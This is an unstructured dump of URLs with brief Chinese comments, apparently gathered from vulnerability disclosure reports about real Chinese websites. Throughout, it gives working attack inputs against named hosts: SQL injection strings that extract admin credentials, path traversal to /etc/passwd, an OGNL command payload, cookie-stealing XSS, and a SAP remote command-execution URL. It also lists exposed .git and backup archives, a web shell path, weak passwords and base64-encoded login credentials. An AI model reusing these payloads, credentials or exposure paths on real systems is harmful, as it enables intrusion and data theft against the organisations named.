http://**.**.**.**/default.aspx http://**.**.**.**/admin/ch/jsp/LoginCheck_initLogin.action http://**.**.**.**/docs/s2-016.html http://**.**.**.**/ http://**.**.**.**/www/index.php?mod=admin&con=subscribe&act=unsubscribe&subsId=31&userId=880&papers_cn=%B8%D6%CC%FA%C2%AF%C1%CF&papers_en=gtll http://**.**.**.**/www/index.php?mod=admin&con=subscribe&act=unsubscribe&subsId=31&userId=880&papers_cn=%B8%D6%CC%FA%C2%AF%C1%CF&papers_en=gtll http://**.**.**.**/www/index.php?mod=admin&con=subscribe&act=unsubscribe&subsId=31&userId=880&papers_cn=%B8%D6%CC%FA%C2%AF%C1%CF&papers_en=gtll http://**.**.**.**/www/index.php?mod=admin&con=subscribe&act=unsubscribe&subsId=31&userId=880&papers_cn=%B8%D6%CC%FA%C2%AF%C1%CF&papers_en=gtll http://**.**.**.**/www/index.php?mod=admin&con=subscribe&act=unsubscribe&subsId=31&userId=880&papers_cn=%B8%D6%CC%FA%C2%AF%C1%CF&papers_en=gtll http://**.**.**.**/phpMyAdmin/ http://**.**.**.**/phpinfo.php http://www.huayiweibo.com/ xx.jpg/.php或xx.jpg%00.php xx.jpg/.php,于是一句话Getshell: http://**.**.**.**/asord/asord_record.php?title=1 http://118.26.224.141/ http://sso.chinaums.com//eWebEditor/admin/login.jsp http://123.124.249.24:8009 http://app.ent.ifeng.com/movie/admin/edit/680 http://app.ent.ifeng.com//movie/admin/uploads/utf.php http://cc.bnchina.com/manage/images/upimg/29046619.aspx?_post___VIEWSTATE=%2FwEPaA8FDzhkMmQ3ZDkxNTc0YmVkZWQ%3D&UPass=88952634&Button_Login=Login http://**.**.**.**/smuexam/admin/salogin.asp http://xianchang03.danmu.tudou.com/index.do http://xianchang03.danmu.tudou.com/dmplayer.do?uid=1&iid=192908540&icode=Z0MtBBwgKVc&aid=0&vcode=&lid=0 http://wap.neuedu.com/crm/login_view.action http://wap.neuedu.com/bug/login_view.action http://wap.neuedu.com/crm/login_view.action http://wap.neuedu.com/bug/login_view.action encap:Ethernet addr:10.3.17.11 Bcast:10.3.17.127 Mask:255.255.255.128 fe8b:36/64 Scope:Link MTU:1500 packets:1396117638 packets:788728684 txqueuelen:1000 
http://**.**.**.**//sysTemplateWeb/ShowWebStyle.aspx?XXDM=440203000008&CatalogId=110101 http://**.**.**.**//sysTemplateWeb/ShowWebStyle.aspx http://**.**.**.**/sysTemplateWeb/ShowWebStyle.aspx http://**.**.**.**//sysTemplateWeb/ShowWebStyle.aspx http://**.**.**.**//sysTemplateWeb/ShowWebStyle.aspx?XXDM=440203000008&CatalogId=110101 http://**.**.**.**//sysTemplateWeb/ShowWebStyle.aspx?XXDM=440203000008&CatalogId=110101 http://www.redcross.ecnu.edu.cn http://www.redcross.ecnu.edu.cn/houtai/login.asp http://www.redcross.ecnu.edu.cn/houtai/Edit/editor/filemanager/browser/default/browser.html?Connector=http%3A%2F%2Fwww.redcross.ecnu.edu.cn%2Fhoutai%2FEdit%2Feditor%2Ffilemanager%2Fconnectors%2Fasp%2Fconnector.asp http://zsbm.dec.ecnu.edu.cn/wems/zsgl/XslqcxIndex.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://**.**.**.**/index.aspx?varCatyID=010101 http://**.**.**.**/admin/login.aspx http://**.**.**.**/ http://**.**.**.**:2222 http://**.**.**.**/zsjy/list_2011.php?catid=138&bid=11 http://**.**.**.**/zsb/list.asp?classid=18该网站 http://**.**.**.**/oa/oa_ContentView.aspx http://**.**.**.**/oa/oa_ContentView.aspx http://**.**.**.**/oa/oa_ContentView.aspx http://**.**.**.**/oa/oa_ContentView.aspx http://**.**.**.**/oa/oa_ContentView.aspx http://**.**.**.**/oa/oa_ContentView.aspx http://**.**.**.**/oa/oa_ContentView.aspx http://**.**.**.**/oa/oa_ContentView.aspx http://tsg.cqupt.edu.cn/software_download/sw_download.php?sw_url= http://tsg.cqupt.edu.cn/software_download/sw_download.php?sw_url=./sw_download.php 
http://**.**.**.**/jttzt/service/Content.aspx?artid=5fc367b5-9038-45a9-a9b1-42c172d74816 http://**.**.**.**/webquery_login.asp http://**.**.**.**:8080/luqu/ http://**.**.**.**/bugs/wooyun-2015-0147226 http://sns.neusoft.com/ http://zone.wooyun.org/content/23175 https://portal.neusoft.com https://www.airkunming.com/payByOrder?orderNo=TK201401112308563 https://www.airkunming.com/payByOrder?orderNo=TK201404212362327 http://www.jinch-home.com//Public/js/php/file_manager_json.php http://www.banchang.cc/Public/js/php/file_manager_json.php jdbc:oracle:oci:@landres http://**.**.**.**/ http://**.**.**.**/chinese/saic_motor_hr/user/file.aspx http://**.**.**.**/chinese/saic_motor_hr/user/ http://**.**.**.**/web/web_programs_dotnet/BBS/index.aspx http://**.**.**.**//web/web_programs_dotnet/BBS/index.aspx http://**.**.**.**//web/web_programs_dotnet/BBS/index.aspx http://**.**.**.**//web/web_programs_dotnet/BBS/index.aspx http://**.**.**.**//web/web_programs_dotnet/BBS/index.aspx http://**.**.**.**//web/web_programs_dotnet/BBS/index.aspx http://**.**.**.**//web/web_programs_dotnet/BBS/index.aspx http://www.sinopecsales.com http://**.**.**.**/search.php http://itpapers.zdnet.com.cn:80/files/search.php?page=1&user=suxuhui http://**.**.**.**/epro/EBid/ManageBid/InviteFee_Edit.asp?TransHistoryId=5112 http://**.**.**.**/Rat/EBid/ManageBid/InviteFee_Edit.asp?TransHistoryId=5112 http://**.**.**.**/Rat//EBid/ManageBid/InviteFee_Edit.asp?TransHistoryId=5112 http://**.**.**.**/pkpmbs/template/rptquerysetlist.aspx?SUBMIT_TYPE=0&defineid=-1&lzstat_uv=34338219962842780482|1738820&__back2definelist=/pkpmbs/jdmanage/AccountQueryList.aspx?lzstat_uv=34338219962842780482|1738820 http://**.**.**.**/pkpmbs/template/rptquerysetlist.aspx?SUBMIT_TYPE=0&defineid=-1&lzstat_uv=34338219962842780482|1738820&__back2definelist=/pkpmbs/jdmanage/AccountQueryList.aspx?lzstat_uv=34338219962842780482|1738820 
http://**.**.**.**/pkpmbs/template/rptquerysetlist.aspx?SUBMIT_TYPE=0&defineid=-1&lzstat_uv=34338219962842780482|1738820&__back2definelist=/pkpmbs/jdmanage/AccountQueryList.aspx?lzstat_uv=34338219962842780482|1738820 http://**.**.**.**/pkpmbs/template/rptquerysetlist.aspx?SUBMIT_TYPE=0&defineid=-1&lzstat_uv=34338219962842780482|1738820&__back2definelist=/pkpmbs/jdmanage/AccountQueryList.aspx?lzstat_uv=34338219962842780482|1738820 http://edm.51itapp.com/dingyue.asp?id=28493995&taskid=7999&keyid=71312 http://p.eqitong.com/index.php/home http://123.150.175.184/ http://123.150.175.180/ http://**.**.**.**/webs/indentify_xmVerify.action存在命令执行漏洞 http://www.class.cn/reset_passwd/reset_show?key=v3IHUKzcpN7iqrCPsGQ0&email=penetest1@163.com http://wtht.wtjr.com http://m.yaofangwang.com/App/forgetpsw.aspx http://www.yingke.tv/Product/ExchangeTicket.aspx?cityid=12 http://www.yingke.tv/MovieList.aspx?keyword=a http://www.yingke.tv/MovieList.aspx?PlayType=2 http://www.yingke.tv/Product/MovieCard.aspx?cityid=11 http://www.yingke.tv/CinemaList.aspx?cityid=11 http://www.yingke.tv/Product/PaperTicket.aspx?cityid=11 http://www.yingke.tv/Shop/ShopDetail.aspx?id=1103 http://www.yingke.tv/Shop/ShopIndex.aspx?categorysubid=82 http://www.yingke.tv/HelpCenter.aspx?id=7 https://**.**.**.** http://**.**.**.**/mh2/login.do http://gps.dongfeng.net/ http://**.**.**.**/Default.aspx?sid=01 https://debug.dingtalk.com/ http://**.**.**.**/personalArea/yljl2.jsp?xsjl_hs=1350003 http://crewinternal.juneyaoair.com:65/ http://sms.juneyaoair.com:9080/SMSNEW/oa!aircrewLogin?username=BaiNingKai&airuser.aircrewName=BaiNingKai&airuser.aircrewDepartment.aircrewDeptCode=FL17 https://exmail.qq.com http://vcp.jd.com/sub_itemext/advisory/initListPage http://shop.chat.jd.com/work/waiterDailyWorkKpi.action?searchCode=0 http://fy.ljth.com http://fy.ljth.com:80/config/ HTTP/1.1 http://fy.ljth.com:80/image/ HTTP/1.1 http://fy.ljth.com:80/UploadFile/ HTTP/1.1 http://fy.ljth.com:80/system/ HTTP/1.1 
http://fy.ljth.com:80/script/ HTTP/1.1 http://fy.ljth.com:80/Log/ HTTP/1.1 http://fy.ljth.com:80/ HTTP/1.1 http://fy.ljth.com/system/adminuser.aspx http://**.**.**.**/webs/personalCenter.action存在命令执行漏洞 http://twww.novartis.com.cn/login/noLoginHome.action http://twww.novartis.com.cn/xx.jsp http://otrivin.novartis.com.cn http://www.novartis.com.cn http://lib.shisu.edu.cn/news_detail.aspx?news_id=19 http://lib.shisu.edu.cn/zydt_detail.aspx?zydt_id=17 http://121.201.33.11:5002/ http://sqlmap.org http://svqd.inspur.com/svqd/jsp/svqd/zhuce/zhuce.jsp https://**.**.**.**/ https://github.com/wangqiaoshi/RealtimeTest/blob/569cee5761e34f1c02b8073636c3bcdf4c35729b/src/main/resources/properties/mail.properties http://**.**.**.** http://bbs.kingsoftstore.com www.ksosoft.com http://www.ksosoft.com/1.txt http://**.**.**.**/kjzb/aqkj/201111/t20111125_189483.htm MYSQL:3306)弱口令: http://www.xiuna.com/ http://zzjz2.edong.com/down/index.php?author=&c http://**.**.**.**/zfcg/FileDown.jsp?fname=userfilesWai/../../../../../etc/passwd https://oa.kysec.cn/login/Login.jsp?logintype=1 https://oa.kysec.cn//weaver/weaver.file.FileDownload?fileid=516&download=1 http://oa.kysec.cn/phpinfo.php http://wap.kysec.cn/phpinfo.php www.kysec.cn/qk.rar http://**.**.**.**/BookList.aspx?e=70ba83fe-b250-40ce-9621-7e7cd7ec33dd http://mail.baofeng.com/ http://**.**.**.**/cct/jpkc_d-new.asp?bk=lxs http://**.**.**.**/cct/jpkc_d-new.asp?bk=lxs http://**.**.**.**/cct/jpkc_d-new.asp?bk=lxs http://pg.yadea.com.cn/phpmyadmin/index.php http://**.**.**.**/zccx/Login http://**.**.**.**/webtool/ http://**.**.**.**/cathay-ins/help/detail.do?id=13%3Cscript%3Ealert%28document.cookie%29%3C/script%3E http://**.**.**.**/SunECM/index.jsp http://**.**.**.**/)直接点击集团版在线试用 http://admin.91huayi.com/web.rar http://cms.91huayi.com/cms.91huayi.com.rar http://dz.91huayi.com/web.rar http://passport.91huayi.com/passport.91huayi.com.rar http://help.ule.com/helpcenter/2011-10-17-05-49-50.html?uspm=1.1.1_V2014.144.4.1 
https://github.com/huyugui1979/TopMedicalNews/blob/1da0799ddeb79ece871476d3b3cb87635eb1c5f6/TopMedicalNews/Business/UserService.cs http://iapp.iiyi.com/zlzs/v7/user/sendcode/?phone=13333333333&os=3 iapp.iiyi.com/zlzs/v7/user/reset/?username=13333333333&password=123123qq&vcode=854342&os=3 http://iapp.iiyi.com/zlzs/v7/user/modpwd/?uid=4902960&oldpwd=123456&newpwd=123456qq http://bbs.iiyi.com/home.php?mod=space&uid=4900006 http://complaint.ceair.com/Complaint/Welcome.do http://olms.sinopec.com/slmwebapp/ http://olms.sinopec.com http://admin.1jiajie.com/v2/index.php?action=login https://ssl.mail.163.com/config.mail.163.com/multiAccount/service/relateAccount.do http://zzjz2.edong.com/down/memberdown.php?imageField=&key=1&mid=150&myord=*&myshownums=20&pcatid=0 http://blog.dhgate.com/wp-login.php http://open.dhgate.com/ http://open.dhgate.com/phpsso_server/index.php http://seller.dhgate.com/seller.tar.gz http://bbs.dhgate.com/source/plugin/tools/tools.php http://**.**.**.**/ index.php/send/sendlist/send_for/?tid=&title=1 index.php/send/sendlist/send_for/?tid=&title=1% http://**.**.**.**/bugs/wooyun-2010-0133376 http://**.**.**.**/extmail/cgi/netdisk.cgi?__mode=list_dir&sid=xxxxf&base=../ http://**.**.**.**/extmail/cgi/readmsg.cgi?__mode=readmsg_sum&sid=xxxxxxxxxxxx&folder=Inbox&msgid=1425325541.M840749P12107V0000000000000802I00000000057872F9_0.mail2014,S=25968:2,S&pos=0 http://www.qtparking.com:80/weixin"+"/zhiFuSuccess?parkCode="+"XXXXXXXXXXXXXXX"+"&userOpenId="+"XXXXXXXXXXXX"+"&outTradeNo="+"XXXXXXXXXXXXXXX http://www.zzidc.com.cn/index.php?cn-s-l-1-1.html http://www.pccb.com/ http://www.dfsszc.com/news.aspx?m=20131120105122323641&n=20131211105954567052 http://**.**.**.**/gen_extra/article/baike.action?channel=hyfx&channelId=34e39156-1f1e-4551-85f1-7db2009b14d9 mse.sogou.com/fb.php http://mse.sogou.com http://**.**.**.**/login.jsp http://**.**.**.**/yuyue/yy-5.html?wid=157&wxid=xx http://**.**.**.**/yuyue/myby-5.html?wid=157 http://**.**.**.**/register/addUi.action 
http://**.**.**.**/ https://**.**.**.**/szogroup/szojava/tree/fadf2629feed21273dbeeb4dd6dc94b98a28abd5/src/test/java/com/szo/app/service http://munion.meituan.com/ juneyao.com/123456 juneyao.com/12345678 juneyao.com/12345678 juneyao.com/111111 juneyao.com/666666 juneyao.com/123456 juneyao.com/qwer1234 juneyao.com/juneyao http://**.**.**.** http://**.**.**.**/ad/ http://**.**.**.**/admin/ http://**.**.**.**/api/ http://**.**.**.**/aspupload/ http://**.**.**.**/database/ http://**.**.**.**/editor/ http://**.**.**.**/inc/ http://**.**.**.**/reg/ http://**.**.**.**/aspupload/09_misc/DirectoryListing.asp?Dir=c:\ http://**.**.**.**/xiaoyou/index1.asp http://**.**.**.**/xiaoyou/admin/admin_index.asp http://58.251.8.70:8000/ http://58.251.8.70:8000/ftb.imagegallery.aspx http://58.251.8.70:8000 http://**.**.**.**/bugs/wooyun-2010-0122195 http://**.**.**.**/weaver/weaver.email.FileDownloadLocation?fileid=39*&download=1 http://**.**.**.**/ http://**.**.**.**/data/ http://**.**.**.**/upload/ http://**.**.**.**:8089/ShowResource/ResourceInfo.aspx?ResourceID=MQ==&ClassPath=&ChinaSort=01.11&ClassTypeID=&ResourceIDs= http://**.**.**.**:8082/ShowResource/ResourceInfo.aspx?ResourceID=MQ==&ClassPath=&ChinaSort=01.11&ClassTypeID=&ResourceIDs= http://**.**.**.**:8001/ShowResource/ResourceInfo.aspx?ResourceID=MQ==&ClassPath=&ChinaSort=01.11&ClassTypeID=&ResourceIDs= http://**.**.**.**:8089/ShowResource/ResourceInfo.aspx?ResourceID=MQ==&ClassPath=&ChinaSort=01.11&ClassTypeID=&ResourceIDs= http://**.**.**.**/ShowResource/ResourceInfo.aspx?ResourceID=MQ==&ClassPath=&ChinaSort=01.11&ClassTypeID=&ResourceIDs= http://202.118.10.130:8080/platform/help/english/images/eng.jsp的一句话,爆破一下,发现了密码弱智,q,连上去翻了翻,发现好几个小马一句话 http://fx.svip.sohu.com/oauth.php?share_id=1 http://**.**.**.**/hbagri/more.do?lanmu_id=12%27&siteid=0 http://go.huanqiu.com/service/vacation?callback=show_vacation&dest=1 http://oa.guobinjiu.cn/yyoa/index.jsp http://oa.guobinjiu.cn/yyoa/common/selectPersonNew/initData.jsp?trueName=1 
http://oa2.xiaoniu66.com:5081/index.action http://**.**.**.**/bugs/wooyun-2015-0147646 http://**.**.**.**/oa/oa_ContentView.aspx?NRID= http://**.**.**.**/oa/oa_ContentView.aspx?NRID= http://**.**.**.**/oa/oa_ContentView.aspx?NRID= http://**.**.**.**/oa/oa_ContentView.aspx?NRID= http://**.**.**.**/oa/oa_ContentView.aspx?NRID= http://**.**.**.**/oa/oa_ContentView.aspx?NRID= http://**.**.**.**/oa/oa_ContentView.aspx?NRID= http://www.fun.tv/风行网-官方网站 http://www.fun.tv index.php/recv/register/register_for/?tid=&title=1 index.php/recv/register/register_for/?tid=&title=1 index.php/recv/register/register_for/?tid=&title=1 http://m.1jiajie.com/login.php?from=wx&weixin_id=o7KvajnDlhdcL55L3CNAUepawQC4 http://oa.jcbx.pudong-edu.sh.cn/areateablog/TeachMyselfTimer.aspx?UID=106586 http://219.239.89.48/index.php/site/login http://118.122.88.90:65000//bos/desktop/RequestOrResponse.aspx http://**.**.**.**:9002/ http://cxb.chexiang.com//service/userCenter/getUserInfo/0 https://oa.kysec.cn/homepage/LoginHomepage.jsp?hpid=52&isfromportal=1 https://oa.kysec.cn/homepage/LoginHomepage.jsp?hpid=52&isfromportal=1 http://**.**.**.**/rhdc_client/jsp/BeforForgetPassword_Control.jsp?logname=-1 http://**.**.**.**/backadmin/login.jsp http://**.**.**.**/wenhuashichang/index.php?id=293 http://**.**.**.**/gongshiwenjian/wenjian/20151020103311.php encap:Ethernet B8:CA:3A:F1:25:8E baca:3aff:fef1:258e/64 Scope:Link MTU:1500 packets:5624966904 packets:7543034697 txqueuelen:1000 http://**.**.**.**/ http://sapbo.nanchu.com:50000//ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd.exe/c http://182.151.206.253/ http://www.pccb.com/activity/app http://mp.weicheche.cn/ http://**.**.**.**/pay/ http://mail.haodf.com/ http://agentapi.dujia.qunar.com/showAllSupplierEmail.do http://mail.itouzi.com/ http://mail.qufenqi.com/ http://61.144.241.87:8080/login/Login.jsp http://61.144.241.87:8080/myname/footer.jsp jdbc:oracle:thin:@192.168.101.187:1521:orcl 
jdbc:oracle:thin:@192.168.101.241:1521:orcl http://eip-portal-test.dongfeng-renault.com.cn/login.jsp http://**.**.**.**/Waterrate/login/ http://xs.emaotai.cn/emaotai.rar http://wap.emaotai.cn/emaotai.rar http://mt.emaotai.cn/emaotai.rar http://gy.emaotai.cn/emaotai.rar http://erp.emaotai.cn/emaotai.rar http://b2b.emaotai.cn/emaotai.rar http://mail.renrenche.com/ http://123.103.86.55/此处目录浏览 http://bbs.pccb.com/Forum/Index/bbsDetail?id=36975&type_id=1&f_t=1&p=7 http://**.**.**.**:8086/gdlisweb/ScarchList.aspx http://**.**.**.**:82/netweb/ScarchList.aspx http://**.**.**.**/ScarchList.aspx http://www.emaotai.cn/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=103 http://exmail.qq.com/login http://zyjn.yfzxmn.cn:8083/zyjn/examTab_get.action?so_Id=227&su_Id=15&ex_type=&ex_time=&sort=ex_Showtime&nowPage=58存在命令执行漏洞 http://**.**.**.**/news_content.php?nno=1006&backurl=index.php http://**.**.**.**/tna.zip http://**.**.**.**/info.php http://**.**.**.**/phpinfo.php http://oa.baixiangfood.com/messager/users.data可以直接打开,数据经过base64加密 http://**.**.**.**/manage/admin/admin_login.aspx http://www.gtcloud.cn/wh/servlet/MainServer?doNothing=Y&nextPage=/login.jsp&login_dept_type=0&spec_login_dept_type=0&flag=&wp_id=0&trivallog=0 http://www.gtcloud.cn/wh/jsp/component/workflow/wfformhisview.jsp?refresh=Y&workflow_id=2014161¤tTaskId=0 http://www.dfss-club.com/service/class.jsp?id=799 http://api.zhaoxiaoshuo.com/ http://test.hotemall.com/test.tar.gz http://**.**.**.**/WeiXin/NavigationArticle.aspx?id=oirjajpnB4Fj0ixgQme_LqPR8fEg&articleId=55 http://**.**.**.**/sys/cx/zj/newzj/newfindRy.jsp?pageNo=33&name=%27+%2B+ltrim%28%27%27%29+%2B+%27&zgcard= http://**.**.**.**/custom.asp?id=17 http://**.**.**.**/admin/login.asp c058:6301::c058:6301 d5c1:ccf5 d5c1:ccf5%16 http://www.midifan.com/modulesecond-index.htm?issale=1%27%22 http://www.midifan.com/modulesoftware-detailview-4338'.htm http://www.midifan.com/modulenews-index.htm?key=%2527%27 
http://www.midifan.com/modulearticle-index.htm?categoryid=-1%27 http://www.midifan.com/modulesecond-index.htm?issale=1*'--+ http://qqtouchbianmin.trip8080.com/tologin.htm触屏版登录的地方,没有验证码,没有登录限制,抓包发现用户名密码均明文传输的,可以fuzzing。。 http://**.**.**.**/banner/Addpicture.aspx?OrderId=35 username:root password:root http://jpkc.ecnu.edu.cn:80/0802/bbs/show.asp?id=1 http://www.emaotai.cn:90/zyd/LoginTo.aspx http://**.**.**.**/jgxx2.asp?id=9 http://**.**.**.**/Case/Default.aspx http://**.**.**/om/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= http://**.**.**/c6//login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= http://**.**.**/wfb/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= http://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= http://itil.ecnu.edu.cn/itsm/index-withoutCA.jsp http://itil.ecnu.edu.cn/itsm/register.do?register=1 http://itil.ecnu.edu.cn/itsm/ssd/ http://itil.ecnu.edu.cn/itsm/security/userMgt.do?method=userDetails&id=1 http://itil.ecnu.edu.cn/ http://bj.cs.ecitic.com/中信证券北京分公司 http://mail.wahaha.com.cn/ http://www.cetools.cn/index.php/cetools/login index.php/cetools/logincheck/026bdd86-6c4c-5645-b158-b57cb5bffa3a index.php/cetools/pxdatadetail?id=20&type=1 http://**.**.**.** inurl:login http://**.**.**.**/epss/login.do?sspeu=MjcxMDMwMzAwMg==&sspep=NDE2Njg2MjMx http://**.**.**.**/epss/login.do?sspeu=MjU1MDMwMjA2MQ==&sspep=enVueWk1MTAw http://**.**.**.**/epss/login.do?sspeu=MjQ1MTEwMTk5OQ==&sspep=c3dqNjkxMDI0 http://www.mob.com/pay/alipay/sms?id=2015102049985453&amount=1 http://**.**.**.**/ROlist.aspx?tab1=%ba%cf%d7%e2 com:8080 www.bobo.com,会自动登陆bobo。自动登陆流程如下 http://bobo.163.com/checkAuth?url=http://www.bobo.com/& 
http://www.bobo.com/auth?NTES_SESS=eVDnHhKqQ5phQfq.SUhKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX0Fz3t.Al2XXgmlY5D8B6zOijFOLH5QM2JXXXXXXXXXXXXLpu7_yJRQLaO0UEF8WpHDS1qJ4_Wmt8qKDG0QHAMnsgcZsae_Af0Ow.65B4BcoDsu9xS1v45ORinZLH&url=http://www.bobo.com/& http://www.bobo.com/ www.bobo.com的XSS即可 http://www.df-finance.com.cn/store/agencylogin.shtml http://**.**.**.**/en/admin/login.aspx http://**.**.**.** http://**.**.**.**/HrMarket_Person/Common/DownLoad/9556 http://**.**.**.**/HrMarket_Person/EditResume/_PartialDeleteAttachment http://**.**.**.** http://mail.mszq.com http://211.151.60.199/ http://lidroid.com/article?id=107 https://m.hongkongairlines.com/ci/data/php/queryArticleByTitle_sqlite.php?title=e'union http://www.bksms.sdu.edu.cn/login www.bksms.sdu.edu.cn http://www.cetools.cn/index.php/cetools_admin/login http://**.**.**.**/ http://**.**.**.**/jsp/ http://**.**.**.**/jsp/j/ http://**.**.**.**/jsp/j/success.jsp http://**.**.**.**/jsp/j/fail.jsp http://data.qiban365.com http://data.qiban365.com/lnwjm/index.php/home/Index/newscontent?id=11e4-d817-dd8d2630-b4e3-210735dca24b www.lvmama.com http://www.lvmama.com http://t-www.brandwisdom.cn/ http://118.26.238.91:8080/ http://t-www.brandwisdom.cn/?s=/Login/login.html http://118.26.238.91:8080/.git/config http://app.focussend.com/webservice/FocusSendWebService.asmx?WSDL http://exam.cmbc.com.cn/wis18/config/ http://exam.cmbc.com.cn/wis18/system/ http://exam.cmbc.com.cn/wis18/upload/ http://**.**.**.**/banshizn.aspx?mkbm=-7837 http://**.**.**.** http://**.**.**.**/pqfcx.go http://**.**.**.**/mallhome.go?updatepass= http://**.**.**.**/mallhome.go?close= http://**.**.**.**/mallhome.go?yhxx= http://**.**.**.**/gly/adminlogin.asp,挑一个跟我心情一般沉重的万能密码 http://dmoa.cofco.com/seeyon/index.jsp http://**.**.**.**/ua/user_respon.php http://**.**.**.**/ua/user_respon.php//module/action/param1/$%7B@phpinfo%28%29%7D http://**.**.**.**/NewsDetail.aspx?NewsId=20151013_170730 http://**.**.**.**/web1/aboutus/about/article 
http://**.**.**.**/div.php?act=publicList&cid=2&count=4 http://rd.haierpeople.cn/1024.aspx http://rd.haierpeople.cn/ASPXSpy.aspx http://rd.haierpeople.cn/Home/Main http://**.**.**.** http://ip.7k7k.com/resin-admin/ http://so.7k7k.com/manage/ http://wx.7k7k.com/phpmyadmin http://v.7k7k.com/info.php http://www.7k7k.com/robots.txt/x.php http://client.dl.126.net/pcmail/dashi/mail.exe下载了Windows版,安装后输入邮箱和密码就直接进入了邮箱,没有让输入短信验证码,就这么绕过了网易邮箱的登录二次验证。 http://test.lxzq.com.cn/web/space/main.html http://**.**.**.**:8080/ http://tuchong.com/rest/.git/config cn:server/tuchong-api.git http://**.**.**.**/index.php https://mail.tsinghua.edu.cn/ http://**.**.**.**/ http://**.**.**.**/jwz/gljg/xsc/xscxsglk/xsc/edit/mbook.asp?class=1 http://**.**.**.**/ http://**.**.**.**/bugs/wooyun-2015-0116233这是洞主提供的4个注入点 http://vps.ule.com/vpsAdmin/admin/main.do dbfen.com/dbfen.com dbfen.com/dbfen.com dbfen.com/dbfen.com http://share.cetools.cn/index/login.asp(存在弱口令,以及没验证码也可进行爆破) http://os.cetools.cn/yl.asp?id=2(存在SQL注入) http://wiki.tuniu.org/display/www/BBS可以下载到配置文件config_inc.php http://**.**.**.**/News.asp?Method=View&NewsID=169 http://www.lvmama.com/zt/promo/mgwq/ www.lvmama.com http://www.lvmama.com/zt/promo/mgwq/ http://antieye.edaijia.cn/ http://113.106.204.64/login http://market.oa.duoyi.com/func/view.aspx?act=sys.login http://cfq.southmoney.com http://**.**.**.**/?mod=acp&do=index http://**.**.**.**/?mod=goods&do=index&class_id=25,参数do过滤不严,导致可以包含任意文件: http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://59.56.25.192/info.php http://180.76.145.239/.git/config http://wanxue.jiaoyu.baidu.com/examples/jsp/ http://scan.safe.baidu.com/.svn/entries http://**.**.**.**/getDetailedContent.action?snavBz=2&contId=7062存在命令执行漏洞 http://ditan.kdnet.net/2012/save.php?artificeid=15&_=1445364118284 http://**.**.**.**/bugs/wooyun-2014-061802 http://**.**.**.**/ArticleList.asp?classtype=gb&lybclass=%C1%F4%D1%D4%B0%E5 
http://**.**.**.**/ArticleList.asp?classtype=gb&lybclass=%C1%F4%D1%D4%B0%E5 http://**.**.**.**/ArticleList.asp?classtype=gb&lybclass=%C1%F4%D1%D4%B0%E5 http://**.**.**.**/ArticleList.asp?classtype=gb&lybclass=%C1%F4%D1%D4%B0%E5 http://**.**.**.**/ArticleList.asp?classtype=gb&lybclass=%C1%F4%D1%D4%B0%E5 http://**.**.**.**/dbcenter/ http://**.**.**.**/dbcenter/irecord/countyRecordTotal.do?userID=20037511 http://**.**.**.**/api/2.0.3/upgrade.php?plat=android&proct=mierapp&versioncode=20150807&apiCode=4 http://baiyin.southmoney.com/ http://baiyin.southmoney.com/admin.php http://**.**.**.**/lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl http://**.**.**.**/lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl http://**.**.**.**/lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl http://**.**.**.**/lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl http://**.**.**.**/lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl http://**.**.**.**/lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl http://**.**.**.**/lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl http://**.**.**.**/lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl http://**.**.**.**/lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl http://**.**.**.**/EmployInfo/ImageDownloadAction.action存在命令执行漏洞 http://daren.sc.weibo.com/h5/front/brand?type=3 http://jz.shangdu.com/Search.aspx?p_name=eBOPRQX http://**.**.**.**) http://**.**.**.**/Home/Index/teacher?id=34 http://**.**.**.**:9080/wscgs/wms/login.jsp http://**.**.**.**/ http://**.**.**.**/getBackPassword 
http://**.**.**.**/cja/guestcj/message.asp?id=2333 http://www.greentownhospital.com http://www.greentownhospital.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 http://z.admin5.com/index.php?pid=6&r=help/category http://**.**.**.**/html/netproject.html?id=1 http://**.**.**.**/ADVPLAYLIST12/ http://**.**.**.**/ADVSEVER12/ http://**.**.**.**/NewForIF/ http://**.**.**.**:84/Login.aspx http://**.**.**.**:86/Login.aspx http://**.**.**.**:85/Login.aspx http://**.**.**.**:86/Login.aspx http://**.**.**.**:84/Login.aspx http://**.**.**.**/sherc/share/getapplyres.jsp?userid=4281 http://**.**.**.**:8080/shlweb/bbs/index.jsp?sid=115162&pno= http://**.**.**.**/sherc/platform/resmanage/TaskList.jsp?userid=null 